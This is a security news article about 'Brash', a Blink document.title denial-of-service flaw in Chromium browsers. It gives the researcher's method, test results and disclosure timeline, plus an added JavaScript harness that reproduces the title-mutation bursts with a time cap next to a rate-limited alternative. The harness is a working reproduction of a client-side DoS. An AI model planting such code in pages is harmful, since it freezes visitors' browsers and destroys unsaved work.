The Brash Attack: Single Webpage Freezes Chrome/Chromium Browsers in Seconds
Researcher Jose Pino has published a proof-of-concept for a denial-of-service flaw in the Blink rendering engine used by Chromium-based browsers, showing how a single web page can, within seconds, lock up most popular browsers and freeze the host system. Pino released the code, which he calls Brash, after it produced severe interface degradation and complete tab freezes across most of the Chromium builds he tested.
The flaw stems from an architectural quirk in how Blink handles document.title: the engine imposes no rate limit on title updates, so a script can queue millions of DOM mutations within milliseconds and saturate the main thread. Pino's method first fills memory with a palette of roughly a hundred unique 512-character hexadecimal strings, then writes them to the title in rapid bursts on a high-frequency timer (for example, burst: 8000, interval: 1 ms), yielding tens of millions of attempted mutations per second. Within 5 to 10 seconds tabs stop responding; after 15 to 60 seconds the browser either crashes or has to be force-killed. In isolated Windows tests a single tab consumed up to 18 GB of RAM and froze the whole system.
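The following is an added example written for this page; it is not Pino's Brash code. It reproduces the pattern described above (a palette of 512-character hex strings written to the title in timed bursts) but with a wall-clock cap so a tester can measure how many title mutations a given browser build accepts without locking it up, and it contrasts that with a coalescing writer that commits only one DOM mutation per frame. The parameter names (burst, intervalMs, maxMs) and the CountingDocument stand-in for document are assumptions for illustration; the defaults mirror the values quoted above.

```javascript
// Added example: bounded reproduction harness for the document.title churn
// described above, plus a coalescing (rate-limited) title writer.
// Not Pino's Brash PoC. Names and defaults are assumptions for illustration.

// Deterministic xorshift32 generator so the palette is reproducible offline.
function makeRng(seed = 0x9e3779b9) {
  let s = seed >>> 0;
  return () => {
    s ^= s << 13; s >>>= 0;
    s ^= s >>> 17;
    s ^= s << 5;  s >>>= 0;
    return s;
  };
}

// Build `count` unique hexadecimal strings of `len` characters (the "palette").
function makePalette(count = 100, len = 512, rng = makeRng()) {
  const palette = new Set();
  while (palette.size < count) {
    let s = '';
    while (s.length < len) s += rng().toString(16).padStart(8, '0');
    palette.add(s.slice(0, len));
  }
  return [...palette];
}

// Constructed stand-in for `document`: counts title writes so the mutation
// cost can be measured outside a browser. In a browser, pass `document`.
class CountingDocument {
  constructor() { this._title = ''; this.writes = 0; }
  get title() { return this._title; }
  set title(v) { this._title = v; this.writes += 1; }
}

// One burst: `burst` synchronous title writes cycling through the palette.
// Every assignment is a separate DOM mutation handled on the main thread.
function burstTitles(doc, palette, burst = 8000, offset = 0) {
  for (let i = 0; i < burst; i++) {
    doc.title = palette[(offset + i) % palette.length];
  }
  return burst;
}

// Repeats bursts on a timer but stops after `maxMs` wall-clock milliseconds,
// so the harness cannot run away. Resolves with the total writes attempted.
function runBounded(doc, { burst = 8000, intervalMs = 1, maxMs = 2000, palette = makePalette() } = {}) {
  return new Promise((resolve) => {
    const start = Date.now();
    let total = 0;
    const timer = setInterval(() => {
      total += burstTitles(doc, palette, burst, total);
      if (Date.now() - start >= maxMs) {
        clearInterval(timer);
        resolve(total);
      }
    }, intervalMs);
  });
}

// The well-behaved alternative: remember only the latest requested title and
// commit it once per scheduling tick, so N requests cost one DOM mutation.
// `schedule` defaults to requestAnimationFrame (or a 16 ms timeout outside a browser).
function makeCoalescedTitleSetter(doc, schedule) {
  if (!schedule) {
    schedule = typeof requestAnimationFrame === 'function'
      ? (fn) => requestAnimationFrame(fn)
      : (fn) => setTimeout(fn, 16);
  }
  let pending = null;
  let scheduled = false;
  function flush() {
    scheduled = false;
    if (pending !== null) { doc.title = pending; pending = null; }
  }
  return {
    set(value) {
      pending = value;
      if (!scheduled) { scheduled = true; schedule(flush); }
    },
    flush,
  };
}

if (typeof module !== 'undefined' && module.exports) {
  module.exports = { makeRng, makePalette, CountingDocument, burstTitles, runBounded, makeCoalescedTitleSetter };
}
```

Pasted into a browser console, `runBounded(document, { maxMs: 2000 }).then(console.log)` reports how many title writes the engine accepted in two seconds; in an affected build the tab will visibly stall for that window and then recover. Note that browsers clamp nested timers to a 4 ms minimum after a few iterations, so the achieved rate is governed far more by the burst size than by the 1 ms interval. The coalescing setter shows the behaviour a page author should want from such an API: eight thousand calls collapse into a single mutation.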
Pino evaluated the PoC across 11 browsers on Android, macOS, Windows and Linux. Nine proved vulnerable: Chrome, Edge, Vivaldi, Arc, Dia, Opera, Perplexity Comet, ChatGPT Atlas and Brave. The two browsers built on other engines, Firefox (Gecko) and Safari (WebKit), did not reproduce the issue, nor did any iOS builds, where WebKit is mandatory for every browser. He notified the Chromium team on August 28 and followed up on August 30; after receiving no timely response or fix, he published the PoC to draw attention to the issue.
Because downstream Chromium vendors maintain their own patches and feature extensions, Pino warns that a fix in upstream Blink may still require bespoke adaptation by each browser maker, complicating and prolonging mitigation. At the time of publication the flaw had not been assigned a CVE or other public identifier; the report and PoC reside on the author's GitHub, and several vendors have yet to issue detailed statements. The impact is availability only: exploitation does not expose tab contents or permit arbitrary code execution, but it is a client-side denial of service that can cause loss of unsaved data and widespread outages, meaning any site a user visits could be weaponized into a trigger for system failure.